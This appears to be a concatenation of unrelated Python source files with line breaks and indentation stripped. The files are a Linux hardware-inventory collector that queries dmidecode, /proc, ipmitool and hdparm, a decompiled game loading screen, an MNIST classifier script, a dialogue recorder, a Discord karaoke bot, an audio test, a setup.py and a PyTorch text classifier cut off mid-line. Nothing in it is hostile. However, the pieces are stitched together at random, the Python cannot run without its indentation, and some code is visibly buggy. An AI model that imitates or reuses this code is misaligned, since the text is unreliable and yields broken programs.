rec.startswith('UUID:'): uuid = rec.split(':')[1].strip() self.devargs.update({'uuid': uuid}) if rec.startswith('Serial Number:'): serial = rec.split(':')[1].strip() if self.get_serial_info: self.devargs.update({'serial_no': serial}) if rec.startswith('Product Name:') and dev_type != 'virtual': hardware = rec.split(':')[1].strip() self.devargs.update({'hardware': hardware}) else: if self.debug: print '\t[-] Failed to get sysdata from host: %s using dmidecode. Message was: %s' % \ (self.machine_name, str(data_err)) self.get_system_2() def get_system_2(self): if 'grep' in self.paths: cmd = "%s/grep '' /sys/devices/virtual/dmi/id/*" % self.paths['grep'] else: cmd = "grep '' /sys/devices/virtual/dmi/id/*" data_out, data_err = self.execute(cmd, True) if data_out: dev_type = 'physical' for rec in data_out: if 'sys_vendor:' in rec: manufacturer = rec.split(':')[1].strip() self.devargs.update({'manufacturer': manufacturer}) if manufacturer in ['VMware, Inc.', 'Bochs', 'KVM', 'QEMU', 'Microsoft Corporation', 'Xen', 'innotek GmbH']: dev_type = 'virtual' if self.ignore_virtual_machines and dev_type == 'virtual': self.devargs.clear() return 'virtual' else: self.devargs.update({'type': dev_type}) if 'product_uuid:' in rec: uuid = rec.split(':')[1].strip() self.devargs.update({'uuid': uuid}) if 'product_serial:' in rec: serial = rec.split(':')[1].strip() if self.get_serial_info: self.devargs.update({'serial_no': serial}) if 'product_name:' in rec and dev_type != 'virtual': hardware = rec.split(':')[1].strip() self.devargs.update({'hardware': hardware}) else: if self.debug: print '\t[-] Failed to get sysdata from host: %s using grep /sys.... 
Message was: %s' % \ (self.machine_name, str(data_err)) self.get_system_3() def get_system_3(self): if 'lshal' in self.paths: cmd = "%s/lshal -l -u computer" % self.paths['lshal'] else: cmd = "lshal -l -u computer" data_out, data_err = self.execute(cmd) if data_out: dev_type = None for rec in data_out: if 'system.hardware.vendor' in rec: manufacturer = rec.split('=')[1].split('(')[0].strip() self.devargs.update({'manufacturer': manufacturer}) if manufacturer in ['VMware, Inc.', 'Bochs', 'KVM', 'QEMU', 'Microsoft Corporation', 'Xen', 'innotek GmbH']: dev_type = 'virtual' if self.ignore_virtual_machines and dev_type == 'virtual': self.devargs.clear() return 'virtual' else: self.devargs.update({'type': dev_type}) if 'system.hardware.uuid' in rec: uuid = rec.split('=')[1].split('(')[0].strip() self.devargs.update({'uuid': uuid}) if 'system.hardware.serial' in rec: serial = rec.split('=')[1].split('(')[0].strip() if self.get_serial_info: self.devargs.update({'serial_no': serial}) if 'system.hardware.product' in rec and dev_type != 'virtual': hardware = rec.split('=')[1].split('(')[0].strip() self.devargs.update({'hardware': hardware}) else: if self.debug: print '\t[-] Failed to get sysdata from host: %s using lshal. Message was: %s' % \ (self.machine_name, str(data_err)) def get_ram(self): if 'grep' in self.paths: cmd = '%s/grep MemTotal /proc/meminfo' % self.paths['grep'] else: cmd = 'grep MemTotal /proc/meminfo' data_out, data_err = self.execute(cmd) if not data_err: memory_raw = ''.join(data_out).split()[1] memory = self.closest_memory_assumption(int(memory_raw) / 1024) self.devargs.update({'memory': memory}) else: if self.debug: print '\t[-] Could not get RAM info from host %s. Message was: %s' % (self.machine_name, str(data_err)) def get_os(self): if 'python2' in self.paths: cmd = '%s/python -c "import platform; raw = list(platform.dist());raw.append(platform.release());print raw"'\ % self.paths['python2'] else: cmd = 'python -c "import platform; raw = list(platform.dist());raw.append(platform.release());print raw"' data_out, data_err = self.execute(cmd) if not data_err: if 'command not found' not in data_out[0]: # because some distros sport python3 by default! self.os, ver, release, kernel_version = ast.literal_eval(data_out[0]) self.devargs.update({'os': self.os}) self.devargs.update({'osver': ver if ver else 'D42_NULL'}) self.devargs.update({'osverno': kernel_version}) return else: if 'python3' in self.paths: cmd = '%s/python3 -c "import platform; raw = list(platform.dist());raw.append(platform.release());' \ 'print (raw)"' % self.paths['python3'] else: cmd = 'python3 -c "import platform; raw = list(platform.dist());' \ 'raw.append(platform.release());print (raw)"' data_out, data_err = self.execute(cmd) if not data_err: self.os, ver, release, kernel_version = ast.literal_eval(data_out[0]) self.devargs.update({'os': self.os}) self.devargs.update({'osver': ver}) self.devargs.update({'osverno': kernel_version}) return else: if self.debug: print '\t[-] Could not get OS info from host %s. 
Message was: %s' % ( self.machine_name, str(data_err)) if data_err and 'command not found' in data_err[0]: if 'python3' in self.paths: cmd = '%s/python3 -c "import platform; raw = list(platform.dist());' \ 'raw.append(platform.release());print (raw)"' % self.paths['python3'] else: cmd = 'python3 -c "import platform; raw = list(platform.dist());' \ 'raw.append(platform.release());print (raw)"' data_out, data_err = self.execute(cmd) if not data_err: self.os, ver, release, kernel_version = ast.literal_eval(data_out[0]) self.devargs.update({'os': self.os}) self.devargs.update({'osver': ver}) self.devargs.update({'osverno': kernel_version}) return else: if self.debug: print '\t[-] Could not get OS info from host %s. Message was: %s' % ( self.machine_name, str(data_err)) else: if self.debug: print '\t[-] Could not get OS info from host %s. Message was: %s' % (self.machine_name, str(data_err)) def get_cpu(self): processors = self.get_cpu_num() if 'cat' in self.paths: cmd = '%s/cat /proc/cpuinfo' % self.paths['cat'] else: cmd = 'cat /proc/cpuinfo' data_out, data_err = self.execute(cmd) if not data_err: cores = 1 cpuspeed = 0 for rec in data_out: if rec.startswith('cpu MHz'): cpuspeed = int((float(rec.split(':')[1].strip()))) if rec.startswith('cpu cores'): cores = int(rec.split(':')[1].strip()) self.devargs.update({'cpucount': processors}) self.devargs.update({'cpucore': cores}) self.devargs.update({'cpupower': cpuspeed}) else: if self.debug: print '\t[-] Could not get CPU info from host %s. Message was: %s' % (self.machine_name, str(data_err)) def get_cpu_num(self): if 'cat' in self.paths: cat_path = self.paths['cat'] + '/cat' else: cat_path = 'cat' if 'grep' in self.paths: grep_path = self.paths['grep'] + '/grep' else: grep_path = 'grep' if 'sort' in self.paths: sort_path = self.paths['sort'] + '/sort' else: sort_path = 'sort' if 'wc' in self.paths: wc_path = self.paths['wc'] + '/wc' else: wc_path = 'wc' cmd = '%s /proc/cpuinfo | %s "physical id" | %s -u | %s -l' % (cat_path, grep_path, sort_path, wc_path) data_out, data_err = self.execute(cmd) if not data_err: cpu_num = ''.join(data_out).strip() return cpu_num else: return 0 def get_ip_ipmi(self): data_out, data_err = self.execute('ipmitool lan print 1') mac = None ip = None if not data_err: for row in data_out: if 'MAC Address' in row: mac_data = row.split() if len(mac_data) > 2: mac = mac_data[3] elif 'IP Address' in row and 'Source' not in row: ip_data = row.split(':') if len(ip_data) > 1: ip = ip_data[1].strip() if ip and mac: self.ip_to_json('ipmi', mac, ip, '') else: if self.debug: print '\t[-] Could not get IPMI IP info from host %s. 
Message was: %s' % (self.machine_name, str(data_err)) def get_ip_ifconfig(self): if 'ifconfig' in self.paths: cmd = '%s/ifconfig' else: cmd = '/sbin/ifconfig' data_out, data_err = self.execute(cmd) if not data_err: new = True nic = mac = ip = ip6 = '' for row in data_out: if row not in ('', '\n', None): if not row.startswith(' '): if new: nic = row.split()[0].strip(':').strip() new = False else: if not nic.startswith('lo'): self.ip_to_json(nic, mac, ip, ip6) nic = row.split()[0].strip(':') new = True if 'HWaddr ' in row: words = row.split() macindex = words.index('HWaddr') + 1 mac = words[macindex].strip() else: new = False if 'inet addr:' in row: words = row.split() ipindex = words.index('inet') + 1 ip = words[ipindex].strip('addr:').strip() elif 'inet ' in row and 'addr:' not in row: words = row.split() ipindex = words.index('inet') + 1 ip = words[ipindex].strip() # debian/ubuntu if 'inet6 addr:' in row and row.split()[-1].lower() != 'scope:link': ip6 = row.split()[2] if '%' in ip6: ip6 = ip6.split('%')[0] if '/' in ip6: ip6 = ip6.split('/')[0] if ip6 and ip6 == '::1': ip6 = '' # redhat/centos elif 'inet6 ' in row and 'addr:' not in row and '' not in row and '' not in row: ip6 = row.split()[1] if '%' in ip6: ip6 = ip6.split('%')[0] if '/' in ip6: ip6 = ip6.split('/')[0] if ip6 and ip6 == '::1': ip6 = '' if 'ether ' in row: words = row.split() macindex = words.index('ether') + 1 mac = words[macindex].strip() if not nic.startswith('lo'): self.ip_to_json(nic, mac, ip, ip6) else: if self.debug: print '\t[-] Could not get IP info from host %s. Message was: %s' % (self.machine_name, str(data_err)) def ip_to_json(self, nic, mac, ip, ip6): macdata = {} nicdata = {} nicdata_v6 = {} nicdata.update({'device': self.device_name}) nicdata_v6.update({'device': self.device_name}) macdata.update({'device': self.device_name}) nicdata.update({'tag': nic}) nicdata_v6.update({'tag': nic}) macdata.update({'port_name': nic}) nicdata.update({'macaddress': mac}) nicdata_v6.update({'macaddress': mac}) macdata.update({'macaddress': mac}) nicdata.update({'ipaddress': ip}) nicdata_v6.update({'ipaddress': ip6}) # if ip != '': self.alldata.append(nicdata) if ip6 != '': self.alldata.append(nicdata_v6) if mac != '': self.alldata.append(macdata) def get_ip_ipaddr(self): if 'ip' in self.paths: cmd = '%s/ip addr show' % self.paths['ip'] else: cmd = 'ip addr show' data_out, data_err = self.execute(cmd) if not data_err and 'command not found' not in data_out[0]: macmap = {} ipmap = {} ip6map = {} nics = [] nicmap = {} current_nic = None for rec in data_out: # macs if not rec.startswith(' ') and rec not in ('', '\n'): if ':' in rec: mac = None raw = rec.split(':') try: nic = raw[1].strip() if '@' in nic: nic = nic.split('@')[0] current_nic = nic rec_index = data_out.index(rec) mac_word = data_out[rec_index + 1] if 'link/ether' in mac_word: parts = mac_word.split() if len(parts) >= 4: mac = parts[1] if nic != 'lo' and mac: macmap.update({nic: mac}) if self.add_nic_as_parts: if nic in self.nic_parts: self.nic_parts[nic]["serial_no"]=mac except IndexError: pass # get nic names and ips elif rec.strip().startswith('inet ') and 'scope global' in rec: inetdata = rec.split() ip = inetdata[1].split('/')[0] interface = inetdata[-1] if ':' in interface: macmap.update({interface: macmap[interface.split(':')[0]]}) nics.append(interface) ipmap.update({interface: ip}) elif rec.strip().startswith('inet6 ') and 'scope global' in rec: inetdata = rec.split() ip = inetdata[1].split('/')[0] interface = current_nic if ':' in interface: 
macmap.update({interface: macmap[interface.split(':')[0]]}) nicmap.update({interface: current_nic}) ip6map.update({interface: ip}) # jsonize for nic in nics: nicdata = {} nicdata_v6 = {} macdata = {} if nic in macmap: mac = macmap[nic] macdata.update({'device': self.device_name}) macdata.update({'port_name': nic}) macdata.update({'macaddress': mac}) if nic in ipmap: ip = ipmap[nic] nicdata.update({'device': self.device_name}) nicdata.update({'tag': nic}) nicdata.update({'ipaddress': ip}) if nic in macmap: mac = macmap[nic] nicdata.update({'macaddress': mac}) if nic in ip6map: ip6 = ip6map[nic] nicdata_v6.update({'device': self.device_name}) nicdata_v6.update({'tag': nic}) nicdata_v6.update({'ipaddress': ip6}) if nic in macmap: mac = macmap[nic] nicdata_v6.update({'macaddress': mac}) if nicdata: self.alldata.append(nicdata) if nicdata_v6: self.alldata.append(nicdata_v6) if macdata: self.alldata.append(macdata) else: if self.debug: print '\t[-] Could not get NIC info from host %s. Switching to "ifconfig".' \ '\n\t\t Message was: %s' % (self.machine_name, str(data_err)) self.get_ip_ifconfig() def get_hdd(self): hdds = self.get_hdd_names() hw_hdds = [x for x in hdds if '/mapper' not in x] if hw_hdds: if self.add_hdd_as_devp : self.devargs.update({'hddcount': len(hw_hdds)}) for hdd in hw_hdds: hdd_part = self.get_hdd_info_hdaparm(hdd) if hdd_part: self.hdd_parts.append(hdd_part) def get_hdd_names(self): if 'fdisk' in self.paths: fdisk_path = self.paths['fdisk'] + '/fdisk' else: fdisk_path = 'fdisk' if 'grep' in self.paths: grep_path = self.paths['grep'] + '/grep' else: grep_path = 'grep' hdd_names = [] cmd = '%s -l | %s -v "ram\|mapper" | %s "Disk /dev"' % (fdisk_path, grep_path, grep_path) data_out, data_err = self.execute(cmd, True) errhdds = [] if data_err: for rec in data_err: if "doesn't contain a valid partition table" in rec: disk = rec.split()[1] errhdds.append(disk) for rec in data_out: try: mess = rec.strip().split() disk = mess[1] if disk.endswith(':'): disk_name = disk.strip(':') else: disk_name = disk sizeformat = mess[3].lower().strip(',') size = float(mess[2]) if self.add_hdd_as_devp: self.devargs.update({'hddsize': size}) if sizeformat in ('mib', 'mb'): size = int(math.ceil(size / 1024)) if self.add_hdd_as_devp: self.devargs.update({'hddsize': size}) hdd_names.append(disk_name) self.disk_sizes.update({disk_name: size}) except Exception as err: print '[?] get_hdd_names exception: ' + str(err) return hdd_names def get_hdd_info_hdaparm(self, hdd): if 'hdparm' in self.paths: cmd = '%s/hdparm -I %s' % (self.paths['hdparm'], hdd) else: cmd = 'hdparm -I %s' % hdd data_out, data_err = self.execute(cmd, True) if data_err: if self.debug: print '[-] Error in get_hdd_info_hdaparm() for IP: %s . 
Message was: %s' % (self.machine_name, data_err) return else: hdd_part = {} for rec in data_out: if 'model number' in rec.lower(): model = rec.split(':')[1].strip() size = self.disk_sizes[hdd] hdd_part.update({'device': self.device_name, 'assignment': 'device'}) hdd_part.update({'name': model}) hdd_part.update({'type': 'hdd'}) hdd_part.update({'hddsize': size}) if 'serial number' in rec.lower(): serial = rec.split(':')[1].strip() hdd_part.update({'serial_no': serial}) if 'transport:' in rec.lower(): if ',' in rec: try: transport = (rec.split(',')[-1]).split()[0] except IndexError: transport = (rec.split(',')[-1]) else: transport = rec.lower() hdd_part.update({'hddtype': transport}) if 'rotation rate' in rec.lower(): rpm = rec.split(':')[1].strip() if not rpm == 'Solid State Device': hdd_part.update({'hddrpm': rpm}) else: hdd_part.update({'hddtype': 'SSD'}) return hdd_part def get_physical_nics(self): if 'find' in self.paths: cmd = "%s/find /sys/devices/pci0000:00 -name net -exec ls '{}' \; -exec dirname '{}' \;" % self.paths['find'] else: cmd = "find /sys/devices/pci0000:00 -name net -exec ls '{}' \; -exec dirname '{}' \;" nics = {} device_name = self.get_name() data_out, data_err = self.execute(cmd) if not data_err: for i in range(0, len(data_out), 2): nic = data_out[i].strip() path = self.check_nic_path(data_out[i + 1].strip()) vendor_code = self.get_nic_vendor_code(path) vendor_subcode = self.get_nic_vendor_subcode(path) model_code = self.get_nic_model_code(path) model_subcode = self.get_nic_model_subcode(path) nics.update({nic:{"manufacturer":vendor_code, "name": model_code, "serial_no": None, "device": device_name, "model_subcode": model_subcode, "manufacturer_subcode": vendor_subcode}}) else: if self.debug: print '[!] Error in get_physical_nics(). Message was: %s' % data_err return nics def check_nic_path(self, path): path_parts = os.path.split(path) # ssb patch try: if 'ssb' in path_parts[-1]: new_path = '/'.join(path_parts[0:-1]) return new_path else: return path except Exception as err: print '[?] 
check_nic_path exception: ' + str(err) def get_nic_vendor_code(self, path): if 'cat' in self.paths: cmd = "%s/cat %s/vendor" % (self.paths['cat'],path) else: cmd = "cat %s/vendor" % path data_out, data_err = self.execute(cmd) if not data_err: vendor_code = ''.join(data_out).strip()[2:] return vendor_code def get_nic_vendor_subcode(self, path): if 'cat' in self.paths: cmd = "%s/cat %s/subsystem_vendor" % (self.paths['cat'],path) else: cmd = "cat %s/subsystem_vendor" % path data_out, data_err = self.execute(cmd) if not data_err: vendor_subcode = ''.join(data_out).strip()[2:] return vendor_subcode def get_nic_model_code(self, path): if 'cat' in self.paths: cmd = "%s/cat %s/device" % (self.paths['cat'],path) else: cmd = "cat %s/device" % path data_out, data_err = self.execute(cmd) if not data_err: model_code = ''.join(data_out).strip()[2:] return model_code def get_nic_model_subcode(self, path): if 'cat' in self.paths: cmd = "%s/cat %s/subsystem_device" % (self.paths['cat'],path) else: cmd = "cat %s/subsystem_device" % path data_out, data_err = self.execute(cmd) if not data_err: sub_code = ''.join(data_out).strip()[2:] return sub_code # uncompyle6 version 3.2.4 # Python bytecode 2.7 (62211) # Decompiled from: Python 2.7.15 (v2.7.15:ca079a3ea3, Apr 30 2018, 16:30:26) [MSC v.1500 64 bit (AMD64)] # Embedded file name: lib.coginvasion.gui.CILoadingScreen from direct.gui.DirectGui import OnscreenText from direct.directnotify.DirectNotifyGlobal import directNotify from direct.showbase.Transitions import Transitions from lib.coginvasion.base import FileUtility loadernotify = directNotify.newCategory('CILoadingScreen') class CILoadingScreen: def __init__(self): self.transitions = Transitions(loader) def createMenu(self): base.graphicsEngine.renderFrame() base.graphicsEngine.renderFrame() self.version_lbl = OnscreenText(text='ver-' + game.version, scale=0.06, pos=(-1.32, -0.97, -0.97), align=TextNode.ALeft, fg=(0.9, 0.9, 0.9, 7)) def beginLoadGame(self): phasesToScan = [ 'models', 'phase_3/models', 'phase_3.5/models', 'phase_4/models'] self.models = FileUtility.findAllModelFilesInVFS(phasesToScan) for model in self.models: loader.loadModel(model) loader.progressScreen.tick() doneInitLoad() self.destroy() def loadModelDone(self, array): self.modelsLoaded += 1 if self.modelsLoaded == len(self.models): doneInitLoad() self.destroy() def destroy(self): self.version_lbl.destroy()import numpy as np from datetime import datetime import pandas as pd import sys sys.path.append('../../mypackages/') import utils def mnist_data(file, train): df = pd.read_csv(file) data = df.as_matrix() np.random.shuffle(data) if train: X = data[:, 1:] / 255.0 # data is from 0..255 Y = data[:, 0] return X, Y else: X = data[:, :] / 255.0 # data is from 0..255 return X try: size except NameError: X, y = mnist_data('/Users/frangy/Documents/DataAna/kaggle_data/mnist_train.csv',1) kaggle_test = mnist_data('/Users/frangy/Documents/DataAna/kaggle_data/mnist_test.csv',0) size=len(y) test_perc=0.8 # perc size of test sample X_train, X_test, y_train, y_test = utils.resize(X, y, test_perc) kaggle_predict=0 findbest=0 #if findbest: # hidden_layer_sizes,activation,solver,learning_rat = utils.best_mlp_cl(X, y) #else: # hidden_layer_sizes = (100, ) # activation = "relu" # solver = "sgd" # learning_rate ="constant" clf_rf = utils.svm_rbf(X_train, y_train) y_pred = clf_rf.predict(X_train) print(y_pred) print('Training score:') utils.get_accuracy_cl(y_pred, y_train) y_pred = clf_rf.predict(X_test) print('Testing score:') utils.get_accuracy_cl(y_pred, 
y_test) #Training score: #(' Score :', 0.934047619047619, '\n Pos_ok:', 2348, 'False Neg:', 0, ' Pos error:', 0.0, '%\n Neg_ok:', 1966, 'False_pos:', 0, ' Neg error:', 0.0, '%') #Testing score: #(' Score :', 0.9287142857142857, '\n Pos_ok:', 2248, 'False Neg:', 1, ' Pos error:', 0.0, '%\n Neg_ok:', 2067, 'False_pos:', 0, ' Neg error:', 0.0, '%') #SLOW! # Use current model to get prediction for the Kaggle test sample: #if kaggle_predict: # results = model.predict(kaggle_test) # f = open('mlp_prediction.txt', 'w') # f.write('ImageId,Label\n') # for i, r in enumerate(results): # s = str(i+1)+str(',')+str(r)+str('\n') # f.write(s) # f.close() dertilo/dialogue-systems0 """ Copyright (c) 2019 Uber Technologies, Inc. Licensed under the Uber Non-Commercial License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at the root directory of this project. See the License for the specific language governing permissions and limitations under the License. """ from dataclasses import dataclass from typing import List from dialog_action_classes import DialogueAct from State import SlotFillingDialogueState __author__ = "" from copy import deepcopy import pickle import os import datetime """ The DialogueEpisodeRecorder is responsible for keeping track of the dialogue experience. It has some standard fields and provides a custom field for any other information we may want to keep track of. """ @dataclass class TurnState: state: SlotFillingDialogueState = None action: List[DialogueAct] = None reward: float = None success: bool = None @dataclass class Experience: state: SlotFillingDialogueState new_state: SlotFillingDialogueState action: List[DialogueAct] = None reward: float = None success: str = None cumulative_reward: float = None input_utterance: str = None output_utterance: str = None custom: str = None class DialogueEpisodeRecorder: def __init__(self, size=None, path=None): self.dialogues: List[List[Experience]] = [] self.size = size self.current_dialogue: List[Experience] = None self.cumulative_reward = 0 self.path = path if path: self.load(path) def set_path(self, path): self.path = path def record( self, new_state, turnstate: TurnState, input_utterance=None, output_utterance=None, force_terminate=False, custom=None, ): # TODO: what does len(actions)==0 mean ?? self.cumulative_reward += turnstate.reward # Check if a dialogue is starting or ending if self.current_dialogue is None: self.current_dialogue = [] self.current_dialogue.append( Experience( state=deepcopy(turnstate.state), new_state=deepcopy(new_state), action=deepcopy(turnstate.action), reward=deepcopy(turnstate.reward), input_utterance=deepcopy(input_utterance) if input_utterance else "", output_utterance=deepcopy(output_utterance) if output_utterance else "", success="", cumulative_reward=deepcopy(self.cumulative_reward), custom=deepcopy(custom) if custom else "", ) ) if turnstate.state.is_terminal() or force_terminate: if turnstate.success is not None: self.current_dialogue[-1].success = turnstate.success # Check if maximum size has been reached if self.size and len(self.dialogues) >= self.size: self.dialogues = self.dialogues[(len(self.dialogues) - self.size + 1) :] self.dialogues.append(self.current_dialogue) self.current_dialogue = [] self.cumulative_reward = 0 def save(self, path=None): if not path: path = self.path if not path: path = f"Logs/Dialogues{datetime.datetime.now().isoformat()}.pkl" print("No Log file name provided. 
Using default: {0}".format(path)) obj = {"dialogues": self.dialogues} try: with open(path, "wb") as file: pickle.dump(obj, file, pickle.HIGHEST_PROTOCOL) except IOError: raise IOError( "Dialogue Episode Recorder I/O Error when " "attempting to save!" ) def load(self, path): if not path: print( "WARNING! Dialogue Episode Recorder: No Log file provided " "to load from." ) if self.dialogues: print( "WARNING! Dialogue Episode Recorder is not empty! Loading " "on top of existing experience." ) if isinstance(path, str): if os.path.isfile(path): print(f"Dialogue Episode Recorder loading dialogues from " f"{path}...") with open(path, "rb") as file: obj = pickle.load(file) if "dialogues" in obj: self.dialogues = obj["dialogues"] print("Dialogue Episode Recorder loaded from {0}.".format(path)) else: print( "Warning! Dialogue Episode Recorder Log file %s not " "found" % path ) else: print( "Warning! Unacceptable value for Dialogue Episode Recorder " "Log file name: %s " % path ) cpjuank/discord_karaokekaraoke.py import discord from discord.ext import commands import os import pendulum import calendar PREFIX = "--" Client = discord.Client() bot = commands.Bot(command_prefix=PREFIX, pm_help = False) bot.remove_command("help") userListPerServer = {} tz = pendulum.timezone('US/Mountain') @bot.event async def on_ready(): print("Bot is ready!") @bot.command(pass_context=True) async def join(ctx): user = ctx.message.author userList = getServerList(ctx.message.server.id) if user not in userList: userList.append(user) await sayList(userList) @bot.command(pass_context=True) async def leave(ctx): user = ctx.message.author userList = getServerList(ctx.message.server.id) userList.remove(user) await sayList(userList) @bot.command(pass_context=True) async def q(ctx): userList = getServerList(ctx.message.server.id) await sayList(userList) @bot.command(pass_context=True) async def sing(ctx): if await isAdmin(ctx.message.author): userList = getServerList(ctx.message.server.id) if len(userList) > 0: userToJump = None args = ctx.message.content.split(" ") if len(args) == 2: userIndex = int(args[1])-1 singJump(userList, userIndex) else: singNext(userList) await sayList(userList) if len(userList) > 0: userOnTop = userList[0] await bot.say("<@{}> Sing!".format(userOnTop.id)) @bot.command(pass_context=True) async def remove(ctx): if await isAdmin(ctx.message.author): userList = getServerList(ctx.message.server.id) args = ctx.message.content.split(" ") userIndex = int(args[1])-1 if userIndex >= 0 and userIndex < len(userList): userList.pop(userIndex) await sayList(userList) @bot.command(pass_context=True) async def clear(ctx): if await isAdmin(ctx.message.author): userList = getServerList(ctx.message.server.id) userList.clear() await sayList(userList) @bot.command() async def help(*args): description = ("\n") description += "**{}join** - Join the queue \n".format(PREFIX) description += "**{}leave** - Leave the queue \n".format(PREFIX) description += "**{}q** - Show the queue \n".format(PREFIX) description += "**{}sing** - Admin command. Next singer in line or singer by position \n".format(PREFIX) description += "**{}remove** - Admin command. Remove a singer by position \n".format(PREFIX) description += "**{}clear** - Admin command. 
Clear the queue \n".format(PREFIX) embed = discord.Embed(colour=0x0dbeff, description=description) # Can use discord.Colour() embed.title = "Commands" await bot.say(embed=embed) def getServerList(serverId): userList = None if serverId in userListPerServer: userList = userListPerServer[serverId] else: userList = [] userListPerServer[serverId] = userList return userList async def isAdmin(author): if author.server_permissions.administrator: return True elif "DJ" in [role.name for role in author.roles]: return True else: await bot.say("call an admin!") return False async def sayList(userList): actualDate = pendulum.now(tz) dayOfWeek = calendar.day_name[actualDate.weekday()] description = "It's {}!!!\n\n".format(dayOfWeek) singer = None for i in range(len(userList)): user = userList[i] userLine = user.nick if userLine == None: userLine = user.name userLine = str(userLine) if i == 0: userLine = "**{}** :musical_note:".format(userLine) singer = user description += "`{}.` {}\n".format(i+1, userLine) embed = discord.Embed(colour=0x0dbeff, description=description) # Can use discord.Colour() embed.title = "" #embed.set_author(name="Karaoke") if singer is not None: thumbnail = singer.avatar_url # thumbnail = thumbnail.replace(".webp?", ".jpeg?") # firefox doesn't support webp print(thumbnail) embed.set_thumbnail(url=thumbnail) embed.set_footer(text="\nCome! Join up!") await bot.say(embed=embed) def singNext(userList): userOnTop = userList.pop(0) userList.append(userOnTop) def singJump(userList, userIndex): if userIndex > 0 and userIndex < len(userList): userToJump = userList.pop(userIndex) userOnTop = userList.pop(0) userList.append(userOnTop) userList.insert(0, userToJump) bot.run(os.environ.get('TOKEN')) #!/usr/bin/python3 import numpy as np from lasp_rtaudio import RtAudio, SampleFormat, Format_SINT32, Format_FLOAT64 import time nframes = 0 samplerate = 48000 omg = 2*np.pi*1000 def mycallback(input_, nframes, streamtime): t = np.linspace(streamtime, streamtime + nframes/samplerate, nframes)[np.newaxis,:] outp = 0.1*np.sin(omg*t) return outp, 0 if __name__ == '__main__': pa = RtAudio() count = pa.getDeviceCount() # dev = pa.getDeviceInfo(0) for i in range(count): dev = pa.getDeviceInfo(i) print(dev) outputparams = {'deviceid': 0, 'nchannels': 1, 'firstchannel': 0} pa.openStream(outputparams, None , Format_FLOAT64,samplerate, 512, mycallback) pa.startStream() input() pa.stopStream() pa.closeStream() ''' Created on 27/10/2018 @author: jackee777 ''' from distutils.core import setup setup( name='babelnetpy', packages = ['babelnetpy'], version='0.1.0', description='it extendings BabelNet HTTP API for python 3', long_description="README.md", author='jackee777', install_requires=['urllib'], url='https://github.com/jackee777/pybabelnet' ) python/baseline/pytorch/classify/model.py import torch import torch.nn as nn import math import json from baseline.model import Classifier, load_classifier_model, create_classifier_model from baseline.pytorch.torchy import * from baseline.utils import listify import torch.backends.cudnn as cudnn cudnn.benchmark = True class WordClassifierBase(nn.Module, Classifier): def __init__(self): super(WordClassifierBase, self).__init__() @classmethod def load(cls, outname, **kwargs): model = torch.load(outname) return model def save(self, outname): print('saving %s' % outname) torch.save(self, outname) @classmethod def create(cls, embeddings_set, labels, **kwargs): word_embeddings = embeddings_set['word'] char_embeddings = embeddings_set.get('char') finetune = kwargs.get('finetune', 
True) activation_type = kwargs.get('activation', 'relu') model = cls() model.gpu = not bool(kwargs.get('nogpu', False)) model.word_dsz = word_embeddings.dsz model.char_dsz = char_embeddings.dsz if char_embeddings is not None else 0 model.pdrop = kwargs.get('dropout', 0.5) model.labels = labels model.lut = pytorch_embedding(word_embeddings, finetune) model.vocab = {} model.vocab['word'] = word_embeddings.vocab if model.char_dsz > 0: model.char_lut = pytorch_embedding(char_embeddings) model.vocab['char'] = char_embeddings.vocab char_filtsz = kwargs.get('cfiltsz', [3]) char_hsz = kwargs.get('char_hsz', 30) model._init_pool_chars(char_hsz, char_filtsz, activation_type) input_sz = model.word_dsz + model.char_comp.outsz else: input_sz = model.word_dsz model.log_softmax = nn.LogSoftmax(dim=1) nc = len(labels) pool_dim = model._init_pool(input_sz, **kwargs) stacked_dim = model._init_stacked(pool_dim, **kwargs) model._init_output(stacked_dim, nc) print(model) return model def create_loss(self): return nn.NLLLoss() def __init__(self): super(WordClassifierBase, self).__init__() def _init_pool_chars(self, char_hsz, char_filtsz, activation_type): self.char_comp = ParallelConv(self.char_dsz, char_hsz, char_filtsz, activation_type, self.pdrop) def make_input(self, batch_dict): x = batch_dict['x'] xch = batch_dict.get('xch') y = batch_dict.get('y') lengths = batch_dict.get('lengths') if self.gpu: x = x.cuda() if xch is not None: xch = xch.cuda() if y is not None: y = y.cuda() return x, xch, lengths, y def forward(self, input): # BxTxC x = input[0] embeddings = self.lut(x) if self.char_dsz > 0: xch = input[1] B, T, W = xch.shape embeddings_char = self._char_encoding(xch.view(-1, W)).view(B, T, self.char_comp.outsz) embeddings = torch.cat([embeddings, embeddings_char], 2) lengths = input[2] pooled = self._pool(embeddings, lengths) stacked = self._stacked(pooled) return self.output(stacked) def classify(self, batch_dict): x = batch_dict['x'] xch = batch_dict.get('xch') lengths = batch_dict.get('lengths') if type(x) == np.ndarray: x = torch.from_numpy(x) if xch is not None and type(xch) == np.ndarray: xch = torch.from_numpy(xch) if lengths is not None and type(lengths) == np.ndarray: lengths = torch.from_numpy(lengths) with torch.no_grad(): if self.gpu: x = x.cuda() if xch is not None: xch = xch.cuda() probs = self((x, xch, lengths)).exp() probs.div_(torch.sum(probs)) results = [] batchsz = probs.size(0) for b in range(batchsz): outcomes = [(self.labels[id_i], prob_i) for id_i, prob_i in enumerate(probs[b])] results.append(outcomes) return results def get_labels(self): return self.labels def get_vocab(self, name='word'): return self.vocab.get(name) def _pool(self, embeddings, lengths): pass def _stacked(self, pooled): if self.stacked is None: return pooled return self.stacked(pooled) def _init_stacked(self, input_dim, **kwargs): hszs = listify(kwargs.get('hsz', [])) if len(hszs) == 0: self.stacked = None return input_dim self.stacked = nn.Sequential() layers = [] in_layer_sz = input_dim for i, hsz in enumerate(hszs): layers.append(nn.Linear(in_layer_sz, hsz)) layers.append(nn.ReLU()) layers.append(nn.Dropout(self.pdrop)) in_layer_sz = hsz append2seq(self.stacked, layers) return in_layer_sz def _init_output(self, input_dim, nc): self.output = nn.Sequential() append2seq(self.output, ( nn.Linear(input_dim, nc), nn.LogSoftmax(dim=1) )) def _init_pool(self, dsz, **kwargs): pass def _char_encoding(self, xch): # For starters we need to perform embeddings for each character # (TxB) x W -> (TxB) x W x D char_embeds = 
